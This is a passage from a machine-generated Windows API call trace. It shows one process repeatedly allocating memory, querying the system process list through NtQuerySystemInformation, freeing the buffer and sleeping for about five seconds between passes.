RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.781] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.781] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.781] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.785] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.785] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.787] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.787] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.788] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.788] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.788] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.793] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.793] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.795] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.795] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.796] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.796] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.796] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.799] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.800] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.802] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.802] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.803] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.803] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.803] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.807] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.807] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.809] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.809] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.810] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.810] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.810] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.814] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.814] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.816] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.816] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.817] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.817] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.817] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.820] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.821] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.823] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.823] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.823] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.824] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.824] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.827] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.828] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.830] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.830] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.831] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.831] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.831] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.835] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.835] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.837] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.837] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.838] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.838] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.843] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.843] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.846] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.846] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.846] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.847] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.847] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.851] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.851] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.853] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.853] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.854] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.854] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.854] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.858] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.858] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.860] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.860] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.861] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.861] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.861] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.865] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.865] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.867] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.867] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.868] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.868] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.868] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.871] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.872] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.874] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.875] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.875] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.875] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.878] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.879] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.880] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.880] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.881] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.881] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.882] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.885] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.886] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.887] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.887] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.888] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.888] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.889] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.892] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.893] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.894] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.894] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.895] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.895] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.895] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.899] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.899] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.901] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.901] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.902] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.902] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.902] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.906] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.907] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.908] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.909] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.909] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.909] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.910] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.914] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.914] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.916] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.916] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.917] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.917] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.917] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.921] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.921] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.923] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.923] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.924] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.924] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.924] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) 